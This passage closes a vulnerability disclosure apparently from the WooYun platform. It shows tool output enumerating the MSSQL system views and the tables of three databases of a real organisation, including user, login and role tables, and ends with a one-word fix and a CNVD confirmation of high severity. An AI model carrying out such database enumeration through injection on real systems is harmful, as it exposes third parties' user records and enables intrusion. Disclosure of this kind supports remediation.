| sys.crypt_properties |
| sys.data_spaces |
| sys.database_files |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_db_file_space_usage |
| sys.dm_db_index_usage_stats |
| sys.dm_db_mirroring_connections |
| sys.dm_db_missing_index_details |
| sys.dm_db_missing_index_group_stats |
| sys.dm_db_missing_index_groups |
| sys.dm_db_partition_stats |
| sys.dm_db_session_space_usage |
| sys.dm_db_task_space_usage |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_cached_plans |
| sys.dm_exec_connections |
| sys.dm_exec_query_optimizer_info |
| sys.dm_exec_query_stats |
| sys.dm_exec_query_transformation_stats |
| sys.dm_exec_requests |
| sys.dm_exec_sessions |
| sys.dm_fts_active_catalogs |
| sys.dm_fts_index_population |
| sys.dm_fts_memory_buffers |
| sys.dm_fts_memory_pools |
| sys.dm_fts_population_ranges |
| sys.dm_io_backup_tapes |
| sys.dm_io_cluster_shared_drives |
| sys.dm_io_pending_io_requests |
| sys.dm_os_buffer_descriptors |
| sys.dm_os_child_instances |
| sys.dm_os_cluster_nodes |
| sys.dm_os_hosts |
| sys.dm_os_latch_stats |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.dm_os_memory_cache_clock_hands |
| sys.dm_os_memory_cache_counters |
| sys.dm_os_memory_cache_entries |
| sys.dm_os_memory_cache_hash_tables |
| sys.dm_os_memory_clerks |
| sys.dm_os_memory_objects |
| sys.dm_os_memory_pools |
| sys.dm_os_performance_counters |
| sys.dm_os_ring_buffers |
| sys.dm_os_schedulers |
| sys.dm_os_stacks |
| sys.dm_os_sublatches |
| sys.dm_os_sys_info |
| sys.dm_os_tasks |
| sys.dm_os_threads |
| sys.dm_os_virtual_address_dump |
| sys.dm_os_wait_stats |
| sys.dm_os_waiting_tasks |
| sys.dm_os_worker_local_storage |
| sys.dm_os_workers |
| sys.dm_qn_subscriptions |
| sys.dm_repl_articles |
| sys.dm_repl_schemas |
| sys.dm_repl_tranhash |
| sys.dm_repl_traninfo |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions |
| sys.dm_tran_current_snapshot |
| sys.dm_tran_current_transaction |
| sys.dm_tran_database_transactions |
| sys.dm_tran_locks |
| sys.dm_tran_session_transactions |
| sys.dm_tran_top_version_generators |
| sys.dm_tran_transactions_snapshot |
| sys.dm_tran_version_store |
| sys.endpoint_webmethods |
| sys.endpoints |
| sys.event_notification_event_types |
| sys.event_notifications |
| sys.events |
| sys.extended_procedures |
| sys.extended_properties |
| sys.filegroups |
| sys.foreign_key_columns |
| sys.foreign_keys |
| sys.fulltext_catalogs |
| sys.fulltext_document_types |
| sys.fulltext_index_catalog_usages |
| sys.fulltext_index_columns |
| sys.fulltext_indexes |
| sys.fulltext_languages |
| sys.http_endpoints |
| sys.identity_columns |
| sys.index_columns |
| sys.indexes |
| sys.internal_tables |
| sys.key_constraints |
| sys.key_encryptions |
| sys.linked_logins |
| sys.login_token |
| sys.master_files |
| sys.master_key_passwords |
| sys.message_type_xml_schema_collection_usages |
| sys.messages |
| sys.module_assembly_usages |
| sys.numbered_procedure_parameters |
| sys.numbered_procedures |
| sys.objects |
| sys.openkeys |
| sys.parameter_type_usages |
| sys.parameter_xml_schema_collection_usages |
| sys.parameters |
| sys.partition_functions |
| sys.partition_parameters |
| sys.partition_range_values |
| sys.partition_schemes |
| sys.partitions |
| sys.plan_guides |
| sys.procedures |
| sys.remote_logins |
| sys.remote_service_bindings |
| sys.routes |
| sys.schemas |
| sys.securable_classes |
| sys.server_assembly_modules |
| sys.server_event_notifications |
| sys.server_events |
| sys.server_permissions |
| sys.server_principals |
| sys.server_role_members |
| sys.server_sql_modules |
| sys.server_trigger_events |
| sys.server_triggers |
| sys.servers |
| sys.service_broker_endpoints |
| sys.service_contract_message_usages |
| sys.service_contract_usages |
| sys.service_contracts |
| sys.service_message_types |
| sys.service_queue_usages |
| sys.service_queues |
| sys.services |
| sys.soap_endpoints |
| sys.sql_dependencies |
| sys.sql_logins |
| sys.sql_modules |
| sys.stats_columns |
| sys.stats_columns |
| sys.symmetric_keys |
| sys.synonyms |
| sys.sysaltfiles |
| sys.syscacheobjects |
| sys.syscharsets |
| sys.syscolumns |
| sys.syscomments |
| sys.sysconfigures |
| sys.sysconstraints |
| sys.syscurconfigs |
| sys.syscursorcolumns |
| sys.syscursorrefs |
| sys.syscursors |
| sys.syscursortables |
| sys.sysdatabases |
| sys.sysdepends |
| sys.sysdevices |
| sys.sysfilegroups |
| sys.sysfiles |
| sys.sysforeignkeys |
| sys.sysfulltextcatalogs |
| sys.sysindexes |
| sys.sysindexkeys |
| sys.syslanguages |
| sys.syslockinfo |
| sys.syslogins |
| sys.sysmembers |
| sys.sysmessages |
| sys.sysobjects |
| sys.sysoledbusers |
| sys.sysopentapes |
| sys.sysperfinfo |
| sys.syspermissions |
| sys.sysprocesses |
| sys.sysprotects |
| sys.sysreferences |
| sys.sysremotelogins |
| sys.syssegments |
| sys.sysservers |
| sys.system_columns |
| sys.system_components_surface_area_configuration |
| sys.system_internals_allocation_units |
| sys.system_internals_partition_columns |
| sys.system_internals_partitions |
| sys.system_objects |
| sys.system_parameters |
| sys.system_sql_modules |
| sys.system_views |
| sys.systypes |
| sys.sysusers |
| sys.tables |
| sys.tcp_endpoints |
| sys.trace_categories |
| sys.trace_columns |
| sys.trace_event_bindings |
| sys.trace_events |
| sys.trace_subclass_values |
| sys.traces |
| sys.transmission_queue |
| sys.trigger_events |
| sys.triggers |
| sys.type_assembly_usages |
| sys.types |
| sys.user_token |
| sys.via_endpoints |
| sys.views |
| sys.xml_indexes |
| sys.xml_schema_attributes |
| sys.xml_schema_collections |
| sys.xml_schema_component_placements |
| sys.xml_schema_components |
| sys.xml_schema_elements |
| sys.xml_schema_facets |
| sys.xml_schema_model_groups |
| sys.xml_schema_namespaces |
| sys.xml_schema_types |
| sys.xml_schema_wildcard_namespaces |
| sys.xml_schema_wildcards |
+---------------------------------------------------+
Database: ZY_PMSS
[38 tables]
+---------------------------------------------------+
| AreaCN |
| AreaDetailCN |
| CMS_Class |
| CMS_Contents |
| CMS_Critic |
| CMS_Docs |
| MsgBoard |
| MsgBoardReply |
| Organization |
| P_BaseInfo |
| P_ChildInfo |
| SYS_Function |
| SYS_Log |
| SYS_Msg |
| SYS_Params |
| SYS_PhotoClass |
| SYS_Photos |
| SYS_RolesFunction |
| SYS_RolesFunction |
| SYS_Services |
| SYS_UserRoles |
| SiteLink |
| USER_BaseInfo |
| dtproperties |
| v_CmsClass |
| v_CmsContents |
| v_CmsList |
| v_DocsList |
| v_FilePath |
| v_MsgBoardList |
| v_Organizations |
| v_PersonBaseInfo |
| v_SysLogs |
| v_SysMsg |
| v_SysPhotoClass |
| v_SysPhotos |
| v_UserList |
| v_UserRolesPower |
+---------------------------------------------------+
Database: ZY_FileTrans
[66 tables]
+---------------------------------------------------+
| AreaCN |
| CMS_Class |
| CMS_Contents |
| CMS_Critic |
| CMS_IncDocs |
| CMS_ShareUsers |
| CMS_Templates |
| SYS_Function |
| SYS_Log |
| SYS_MissionBill |
| SYS_MissionDocs |
| SYS_Msg |
| SYS_Params |
| SYS_PhotoClass |
| SYS_Photos |
| SYS_QueueSvrs |
| SYS_RolesFunction |
| SYS_RolesFunction |
| SYS_Seal |
| SYS_UserRoles |
| SiteLink |
| USER_AddressList |
| USER_Archives |
| USER_Asset |
| USER_Attend |
| USER_AttendSet |
| USER_BaseInfo |
| USER_Department |
| USER_PR_List |
| USER_Schedule |
| USER_WorkLog |
| UserHD_Directory |
| UserHD_Files |
| WorkFlowLogs |
| WorkFlowNames |
| WorkFlowNodes |
| dtproperties |
| v_Arrangement |
| v_CMSAsset |
| v_CMSContentsDetail |
| v_CMSContentsDetail |
| v_CMSContentsImg |
| v_CMSContentsList |
| v_CMSCritics |
| v_CMSPhotos |
| v_CMS_Templates |
| v_DocsList |
| v_FilePath |
| v_MissionBill |
| v_PR_List |
| v_SYS_Seal |
| v_ScheduleState |
| v_SysLogs |
| v_SysMsg |
| v_SysPhotoClass |
| v_SysPhotos |
| v_UserArchives |
| v_UserAttend |
| v_UserClientInfo |
| v_UserHD_Directory |
| v_UserHD_Files |
| v_UserList |
| v_UserRolesPower |
| v_UserSchedules |
| v_UserWorkLogs |
| v_WorkFlows |
+---------------------------------------------------+
Database: ZY_IPS
[69 tables]
+---------------------------------------------------+
| AreaCN |
| CMS_Class |
| CMS_Contents |
| CMS_Critic |
| CMS_IncDocs |
| CMS_ShareUsers |
| SYS_AssetsOut |
| SYS_AssetsOut |
| SYS_Customer_PR |
| SYS_Customer_PR |
| SYS_Function |
| SYS_Log |
| SYS_MissionDocs |
| SYS_MissionDocs |
| SYS_MissionDocs |
| SYS_Msg |
| SYS_Params |
| SYS_PhotoClass |
| SYS_Photos |
| SYS_RolesFunction |
| SYS_RolesFunction |
| SYS_UserRoles |
| SiteLink |
| USER_AddressList |
| USER_Archives |
| USER_Attend |
| USER_AttendSet |
| USER_BaseInfo |
| USER_Department |
| USER_Schedule |
| USER_WorkLog |
| USER_WorkLogView |
| UserHD_Directory |
| UserHD_Files |
| WorkFlowLogs |
| WorkFlowNames |
| WorkFlowNodes |
| dtproperties |
| v_Arrangement |
| v_AssetsOut |
| v_CMSAsset |
| v_CMSContentsDetail |
| v_CMSContentsDetail |
| v_CMSContentsImg |
| v_CMSContentsList |
| v_CMSCritics |
| v_CMSPhotos |
| v_CustomerInfo |
| v_DocsList |
| v_FilePath |
| v_MissionDo |
| v_Missions |
| v_PR_List |
| v_ScheduleState |
| v_SysLogs |
| v_SysMsg |
| v_SysPhotoClass |
| v_SysPhotos |
| v_UserArchives |
| v_UserAttend |
| v_UserHD_Directory |
| v_UserHD_Files |
| v_UserList |
| v_UserRolesPower |
| v_UserRolesPower |
| v_UserSchedules |
| v_UserWorkLogs |
| v_WorkFlows |
| v_WorkLogViewUser |
+---------------------------------------------------+

修复方案:

过滤。。

版权声明:转载请注明来源 YY-2012@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-03-17 11:26

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给陕西分中心,由陕西分中心后续协调网站管理单位处置。

最新状态:

暂无